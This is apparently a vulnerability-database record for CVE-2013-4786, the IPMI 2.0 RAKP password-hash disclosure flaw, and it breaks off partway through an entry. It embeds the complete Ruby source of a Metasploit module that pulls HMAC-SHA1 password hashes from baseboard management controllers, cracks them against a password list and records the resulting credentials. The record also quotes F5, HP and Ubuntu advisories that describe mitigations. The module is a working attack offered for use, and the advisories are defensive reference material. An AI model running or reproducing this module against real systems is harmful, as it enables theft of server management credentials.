{"id": "MSF:AUXILIARY/SCANNER/IPMI/IPMI_DUMPHASHES", "type": "metasploit", "bulletinFamily": "exploit", "title": "IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval", "description": "This module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.\n", "published": "2013-06-23T04:38:28", "modified": "2018-09-15T23:54:45", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["http://fish2.com/ipmi/remote-pw-cracking.html", "https://seclists.org/bugtraq/2014/Apr/16", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4786"], "cvelist": ["CVE-2013-4786"], "lastseen": "2020-09-19T00:12:28", "viewCount": 3515, "enchantments": {"dependencies": {"references": [{"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97"]}, {"type": "cve", "idList": ["CVE-2013-4786"]}, {"type": "f5", "idList": ["F5:K16846", "SOL16846"]}, {"type": "jvn", "idList": ["JVN:38752718"]}, {"type": "nessus", "idList": ["IPMI_PASSHASH_DISCLOSURE.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2016V3", "ORACLE:CPUAPR2016V3-2985753"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30452", "SECURITYVULNS:VULN:13665"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-4786"]}]}, "score": {"value": 5.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97"]}, {"type": "canvas", "idList": ["ZEN"]}, {"type": "cve", "idList": ["CVE-2013-4786"]}, {"type": "f5", "idList": ["SOL16846"]}, {"type": "n0where", "idList": ["N0WHERE:161003", "N0WHERE:76327"]}, {"type": "nessus", "idList": ["IPMI_PASSHASH_DISCLOSURE.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13665"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-4786"]}]}, "exploitation": null, "vulnersScore": 5.5}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/ipmi'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval',\n 'Description' => %q|\n This module identifies IPMI 2.0-compatible systems and attempts to retrieve the\n HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a\n file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb\n in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.\n |,\n 'Author' => [ 'Dan Farmer <zen[at]fish2.com>', 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'http://fish2.com/ipmi/remote-pw-cracking.html'],\n ['URL', 'https://seclists.org/bugtraq/2014/Apr/16'], # HP's SSRT101367\n ['CVE', '2013-4786'],\n ['OSVDB', '95057'],\n ['BID', '61076'],\n ],\n 'DisclosureDate' => 'Jun 20 2013'\n )\n\n register_options(\n [\n Opt::RPORT(623),\n OptPath.new('USER_FILE', [ true, \"File containing usernames, one per line\",\n File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_users.txt')\n ]),\n OptPath.new('PASS_FILE', [ true, \"File containing common passwords for offline cracking, one per line\",\n File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_passwords.txt')\n ]),\n OptString.new('OUTPUT_HASHCAT_FILE', [false, \"Save captured password hashes in hashcat format\"]),\n OptString.new('OUTPUT_JOHN_FILE', [false, \"Save captured password hashes in john the ripper format\"]),\n OptBool.new('CRACK_COMMON', [true, \"Automatically crack common passwords as they are obtained\", true])\n ])\n\n end\n\n def post_auth?\n true\n end\n\n def default_cred?\n true\n end\n\n def ipmi_status(msg)\n vprint_status(\"#{rhost}:#{rport} - IPMI - #{msg}\")\n end\n\n def ipmi_error(msg)\n vprint_error(\"#{rhost}:#{rport} - IPMI - #{msg}\")\n end\n\n def ipmi_good(msg)\n print_good(\"#{rhost}:#{rport} - IPMI - #{msg}\")\n end\n\n def run_host(ip)\n\n ipmi_status(\"Sending IPMI probes\")\n\n usernames = []\n passwords = []\n\n # Load up our username list (save on open fds)\n ::File.open(datastore['USER_FILE'], \"rb\") do |fd|\n fd.each_line do |line|\n usernames << line.strip\n end\n end\n usernames << \"\"\n usernames = usernames.uniq\n\n # Load up our password list (save on open fds)\n ::File.open(datastore['PASS_FILE'], \"rb\") do |fd|\n fd.each_line do |line|\n passwords << line.gsub(/\\r?\\n?/, '')\n end\n end\n passwords << \"\"\n passwords = passwords.uniq\n\n self.udp_sock = Rex::Socket::Udp.create({'Context' => {'Msf' => framework, 'MsfExploit' => self}})\n add_socket(self.udp_sock)\n\n reported_vuln = false\n\n usernames.each do |username|\n console_session_id = Rex::Text.rand_text(4)\n console_random_id = Rex::Text.rand_text(16)\n\n ipmi_status(\"Trying username '#{username}'...\")\n\n rakp = nil\n sess = nil\n sess_data = nil\n\n # It may take multiple tries to get a working \"session\" on certain BMCs (HP iLO 4, etc)\n 1.upto(5) do |attempt|\n\n r = nil\n 1.upto(3) do\n udp_send(Rex::Proto::IPMI::Utils.create_ipmi_session_open_request(console_session_id))\n r = udp_recv(5.0)\n break if r\n end\n\n unless r\n ipmi_status(\"No response to IPMI open session request\")\n rakp = nil\n break\n end\n\n sess = process_opensession_reply(*r)\n unless sess\n ipmi_status(\"Could not understand the response to the open session request\")\n rakp = nil\n break\n end\n\n if sess.data.length < 8\n ipmi_status(\"Refused IPMI open session request\")\n rakp = nil\n break\n end\n\n sess_data = Rex::Proto::IPMI::Session_Data.new.read(sess.data)\n\n r = nil\n 1.upto(3) do\n udp_send(Rex::Proto::IPMI::Utils.create_ipmi_rakp_1(sess_data.bmc_session_id, console_random_id, username))\n r = udp_recv(5.0)\n break if r\n end\n\n unless r\n ipmi_status(\"No response to RAKP1 message\")\n next\n end\n\n rakp = process_rakp1_reply(*r)\n unless rakp\n ipmi_status(\"Could not understand the response to the RAKP1 request\")\n rakp = nil\n break\n end\n\n # Sleep and retry on session ID errors\n if rakp.error_code == 2\n ipmi_error(\"Returned a Session ID error for username #{username} on attempt #{attempt}\")\n Rex.sleep(1)\n next\n end\n\n if rakp.error_code != 0\n ipmi_error(\"Returned error code #{rakp.error_code} for username #{username}: #{Rex::Proto::IPMI::RMCP_ERRORS[rakp.error_code].to_s}\")\n rakp = nil\n break\n end\n\n # TODO: Finish documenting this error field\n if rakp.ignored1 != 0\n ipmi_error(\"Returned error code #{rakp.ignored1} for username #{username}\")\n rakp = nil\n break\n end\n\n # Check if there is hash data\n if rakp.data.length < 56\n rakp = nil\n break\n end\n\n # Break out of the session retry code if we make it here\n break\n end\n\n # Skip to the next user if we didnt get a valid response\n next if !rakp\n\n # Calculate the salt used in the hmac-sha1 hash\n rakp_data = Rex::Proto::IPMI::RAKP2_Data.new.read(rakp.data)\n hmac_buffer = Rex::Proto::IPMI::Utils.create_rakp_hmac_sha1_salt(\n console_session_id,\n sess_data.bmc_session_id,\n console_random_id,\n rakp_data.bmc_random_id,\n rakp_data.bmc_guid,\n 0x14,\n username\n )\n\n sha1_salt = hmac_buffer.unpack(\"H*\")[0]\n sha1_hash = rakp_data.hmac_sha1.unpack(\"H*\")[0]\n\n if sha1_hash == \"0000000000000000000000000000000000000000\"\n ipmi_error(\"Returned a bogus SHA1 hash for username #{username}\")\n next\n end\n\n ipmi_good(\"Hash found: #{username}:#{sha1_salt}:#{sha1_hash}\")\n\n write_output_files(rhost, username, sha1_salt, sha1_hash)\n\n # Write the rakp hash to the database\n hash = \"#{rhost} #{username}:$rakp$#{sha1_salt}$#{sha1_hash}\"\n core_id = report_hash(username, hash)\n # Write the vulnerability to the database\n unless reported_vuln\n report_vuln(\n :host => rhost,\n :port => rport,\n :proto => 'udp',\n :sname => 'ipmi',\n :name => 'IPMI 2.0 RMCP+ Authentication Password Hash Exposure',\n :info => \"Obtained password hash for user #{username}: #{sha1_salt}:#{sha1_hash}\",\n :refs => self.references\n )\n reported_vuln = true\n end\n\n # Offline crack common passwords and report clear-text credentials\n next unless datastore['CRACK_COMMON']\n\n passwords.uniq.each do |pass|\n pass = pass.strip\n next unless pass.length > 0\n next unless Rex::Proto::IPMI::Utils.verify_rakp_hmac_sha1(hmac_buffer, rakp_data.hmac_sha1, pass)\n ipmi_good(\"Hash for user '#{username}' matches password '#{pass}'\")\n\n # Report the clear-text credential to the database\n report_cracked_cred(username, pass, core_id)\n break\n end\n end\n end\n\n def process_opensession_reply(data, shost, sport)\n shost = shost.sub(/^::ffff:/, '')\n info = Rex::Proto::IPMI::Open_Session_Reply.new.read(data) rescue nil\n return unless info && info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RMCPPLUSOPEN_REP\n info\n end\n\n def process_rakp1_reply(data, shost, sport)\n shost = shost.sub(/^::ffff:/, '')\n info = Rex::Proto::IPMI::RAKP2.new.read(data) rescue nil\n return unless info && info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RAKP2\n info\n end\n\n\n def write_output_files(rhost, username, sha1_salt, sha1_hash)\n if datastore['OUTPUT_HASHCAT_FILE']\n ::File.open(datastore['OUTPUT_HASHCAT_FILE'], \"ab\") do |fd|\n fd.write(\"#{rhost} #{username}:#{sha1_salt}:#{sha1_hash}\\n\")\n fd.flush\n end\n end\n\n if datastore['OUTPUT_JOHN_FILE']\n ::File.open(datastore['OUTPUT_JOHN_FILE'], \"ab\") do |fd|\n fd.write(\"#{rhost} #{username}:$rakp$#{sha1_salt}$#{sha1_hash}\\n\")\n fd.flush\n end\n end\n end\n\n def service_data\n {\n address: rhost,\n port: rport,\n service_name: 'ipmi',\n protocol: 'udp',\n workspace_id: myworkspace_id\n }\n end\n\n def report_hash(user, hash)\n credential_data = {\n module_fullname: self.fullname,\n origin_type: :service,\n private_data: hash,\n private_type: :nonreplayable_hash,\n jtr_format: 'rakp',\n username: user,\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_data)\n\n cl = create_credential_login(login_data)\n cl ? cl.core_id : nil\n end\n\n def report_cracked_cred(user, password, core_id)\n cred_data = {\n core_id: core_id,\n username: user,\n password: password\n }\n\n create_cracked_credential(cred_data)\n end\n\n #\n # Helper methods (these didn't quite fit with existing mixins)\n #\n\n attr_accessor :udp_sock\n\n def udp_send(data)\n begin\n udp_sock.sendto(data, rhost, datastore['RPORT'], 0)\n rescue ::Interrupt\n raise $!\n rescue ::Exception\n end\n end\n\n def udp_recv(timeo)\n r = udp_sock.recvfrom(65535, timeo)\n r[1] ? r : nil\n end\n\n def rhost\n datastore['RHOST']\n end\n\n def rport\n datastore['RPORT']\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "edition": 2, "scheme": null, "_state": {"dependencies": 1647589307, "score": 0}}

{"f5": [{"lastseen": "2019-04-30T18:21:13", "description": "\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.1 \n11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| Not vulnerable1| None \nBIG-IP AAM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable1| None \nBIG-IP AFM| None| 12.0.0 - 12.1.1 \n11.3.0 - 11.6.1| Not vulnerable1| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.1 \n11.0.0 - 11.6.1| Not vulnerable1| None \nBIG-IP APM| None| 12.0.0 - 12.1.1 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable1| None \nBIG-IP ASM| None| 12.0.0 - 12.1.1 \n11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| Not vulnerable1| None \nBIG-IP DNS| None| 12.0.0 - 12.1.1| Not vulnerable1| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.1 \n11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| Not vulnerable1| None \nBIG-IP PEM| None| 12.0.0 - 12.1.1 \n11.3.0 - 11.6.1| Not vulnerable1| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| None| Low| IPMI \n \n1 The specified products, when running on the iSeries platform, contain the affected code. However, F5 identifies the vulnerability status as **Not vulnerable** because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\n**Note**: For information about BIG-IP hardware compatibility, refer to [K9476: The F5 hardware/software compatibility matrix](<https://support.f5.com/csp/article/K9476>).\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 recommends that you do not enable IPMI on iSeries platforms if it is not needed. If you must use IPMI, use a separate management Local Area Network (LAN) or Virtual Local Area Network (VLAN), Access Control Lists (ACLs), or Virtual Private Network (VPN) to limit and restrict access to your iLO management interfaces.\n\nTo disable IPMI, perform the following procedure:\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. To determine if IPMI is enabled, type the following command: \n\nlist /sys aom ipmi\n\n**Note**: IF IPMI is already disabled, you can skip step 3.\n\n 3. To disable IPMI, type the following command: \n\nmodify /sys aom ipmi disabled\n\nMitigation\n\nTo mitigate this vulnerability for Traffix SDC, you can perform the following tasks:\n\n * Disable IPMI if it is not needed. If you must use IPMI, use a separate management LAN or VLAN, ACLs, or VPN to limit and restrict access to your iLO management interfaces.\n * Maintain the latest IPMI version and Baseboard Management Controller (BMC) firmware that contains the most recent security patches.\n * Employ best practices in the management of the protocols and passwords on your systems and networks.\n * Use strong passwords.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2015-07-02T20:52:00", "type": "f5", "title": "IPMI vulnerability CVE-2013-4786", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4786"], "modified": "2017-04-26T19:20:00", "id": "F5:K16846", "href": "https://support.f5.com/csp/article/K16846", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T19:14:50", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability for Traffix SDC, you can perform the following tasks:\n\n * Disable the Intelligent Plaform Management Interface (IPMI) if it is not needed. If you must use IPMI, use a separate management LAN or VLAN, Access Control Lists (ACLs), or VPN to limit and restrict access to your iLO management interfaces.\n * Maintain the latest IPMI version and Baseboard Management Controller (BMC) firmware that contains the most recent security patches.\n * Employ best practices in the management of the protocols and passwords on your systems and networks.\n * Use strong passwords.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2015-07-02T00:00:00", "type": "f5", "title": "SOL16846 - IPMI vulnerability CVE-2013-4786", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4786"], "modified": "2016-12-02T00:00:00", "id": "SOL16846", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/800/sol16846.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2021-06-08T19:00:09", "description": "Information leakage of password.", "edition": 2, "cvss3": {}, "published": "2014-04-07T00:00:00", "title": "HP Integrated Lights-Out unauthorized access", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-4786"], "modified": "2014-04-07T00:00:00", "id": "SECURITYVULNS:VULN:13665", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13665", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04197764\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04197764\r\nVersion: 1\r\n\r\nHPSBHF02981 rev.1 - HP Integrated Lights-Out 2, 3, and 4 &#40;iLO2, iLO3, iLO4&#41;,\r\nIPMI 2.0 RCMP+ Authentication Remote Password Hash Vulnerability &#40;RAKP&#41;\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-03-13\r\nLast Updated: 2014-04-03\r\n\r\nPotential Security Impact: Disclosure of information, elevation of\r\nprivileges, privileged access.\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP Integrated\r\nLights-Out 2, 3, and 4 &#40;iLO2, iLO3, iLO4&#41;. The vulnerability could be\r\nexploited to allow an attacker to gain unauthorized privileges and\r\nunauthorized access to privileged information.\r\n\r\nReferences: CVE-2013-4786 &#40;SSRT101367&#41;\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Integrated Lights-Out 2, 3, and 4 &#40;iLO2, iLO3, iLO4&#41;\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2013-4786 &#40;AV:N/AC:M/Au:S/C:C/I:C/A:C&#41; 8.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nThere is no resolution to this issue. The authentication process for the IPMI\r\n2.0 specification mandates that the server send a salted SHA1 or MD5 hash of\r\nthe requested user&#39;s password to the client, prior to the client\r\nauthenticating. The BMC returns the password hash for any valid user account\r\nrequested. This password hash can be broken using an offline brute force or\r\ndictionary attack. Because this functionality is a key part of the IPMI 2.0\r\nspecification, there is no way to fix the problem without deviating from the\r\nIPMI 2.0 specification. HP recommends the following actions to mitigate the\r\nrisk this introduces:\r\n\r\nIf you do not need to use IPMI, disable it. You can disable IPMI on iLO2/3/4\r\nusing the Disable IPMI over LAN command.\r\nMaintain the latest iLO firmware that contains the most recent security\r\npatches.\r\nEmploy best practices in the management of the protocols and passwords on\r\nyour systems and networks. Use strong passwords wherever possible.\r\nIf you must use IPMI, use a separate management LAN or VLAN, Access Control\r\nLists &#40;ACLs&#41;, or VPN to limit and restrict access to your iLO management\r\ninterfaces.\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 1 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided &quot;as is&quot;\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 &#40;GNU/Linux&#41;\r\n\r\niEUEARECAAYFAlM9cJsACgkQ4B86/C0qfVnbwACXXqq8fU9jBRG678VeC7u4dJ2c\r\nygCff0rQ7F3nDg4doYidlkJfVp8eh5s=\r\n=pGl4\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "cvss3": {}, "published": "2014-04-07T00:00:00", "title": "[security bulletin] HPSBHF02981 rev.1 - HP Integrated Lights-Out 2, 3, and 4 &#40;iLO2, iLO3, iLO4&#41;, IPMI 2.0 RCMP+ Authentication Remote Password Hash Vulnerability &#40;RAKP&#41;", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-4786"], "modified": "2014-04-07T00:00:00", "id": "SECURITYVULNS:DOC:30452", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30452", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:53:19", "description": "The IPMI 2.0 specification supports RMCP+ Authenticated Key-Exchange\nProtocol (RAKP) authentication, which allows remote attackers to obtain\npassword hashes and conduct offline password guessing attacks by obtaining\nthe HMAC from a RAKP message 2 response from a BMC.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | protocol problem. Not clear if fixes also need to be addressed in freeipmi and openipmi per Debian: \"Contacted relevant maintainers: Since few to no devices do mutual authentication, tools shipped by Debian are generally not affected. At best, the tools can print a warning for vulnerable devices.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2013-07-08T00:00:00", "type": "ubuntucve", "title": "CVE-2013-4786", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4786"], "modified": "2013-07-08T00:00:00", "id": "UB:CVE-2013-4786", "href": "https://ubuntu.com/security/CVE-2013-4786", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T13:52:15", "description": "The IPMI 2.0 specification supports RMCP+ Authenticated Key-Exchange Protocol (RAKP) authentication, which allows remote attackers to obtain password hashes and conduct offline password guessing attacks by obtaining the HMAC from a RAKP message 2 response from a BMC.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": 